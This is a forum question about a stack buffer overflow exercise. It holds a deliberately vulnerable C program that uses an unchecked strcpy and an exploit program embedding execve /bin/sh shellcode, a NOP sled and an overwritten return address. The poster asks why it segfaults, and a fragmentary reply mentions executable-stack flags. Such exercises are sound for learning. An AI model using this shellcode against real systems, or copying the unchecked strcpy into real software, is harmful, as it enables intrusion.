I'm following the video here: https://www.youtube.com/watch?v=N0DBu3TGejI
ExploitMe.c
#include<stdio.h>
#include<string.h>
main(int argc, char **argv)
{
char buffer[80];
strcpy(buffer, argv[1]);
return 1;
}
HackYou.c
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
// shellcode ripped from http://www.milw0rm.com/shellcode/444
char shellcode[]=
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x99" // cltd
"\x52" // pushl %edx
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80
;
char retaddr[] = "\x08\xf3\xff\xbf";
#define NOP 0x90
main()
{
char buffer[96];
memset(buffer, NOP, 96);
memcpy(buffer, "EGG=", 4);
memcpy(buffer+4, shellcode, 24);
memcpy(buffer+88, retaddr, 4);
memcpy(buffer+92, "\x00\x00\x00\x00", 4);
putenv(buffer);
system("/bin/sh");
return 0;
}
I run ./HackYou, in that environment there is an enviroment variable named $EGG that is used as an argument to the ExploitMe.c. $EGG contains: 24 bytes shell code, 60 bytes nop, and 4 bytes to override the RET address for a total of 88 bytes (Buffer + EBP + RET)
This screenshot contains the information you need to know:
On ExploitMe.c, I break on line 8. The first thing I print is the stack. 0x00881d36 is the RET address.
Then I print argv1, as you can see it is 22 words. It will overwrite the Buffer+EBP+RET exactly. The start of the buffer variable is at 0xbffff308 (ESP+8), so I add that into the end of the payload.
Then I step. The RET has been perfectly overwritten with the buffer memory address.
It should return to the beginning of the buffer and start executing my shell code. All seems fine to me, but instead of giving me a shell, it gives me a segmentation fault.
What's going on?
Thank you.
return 1;, what's the disassembly for the code at$eip?-z execstack.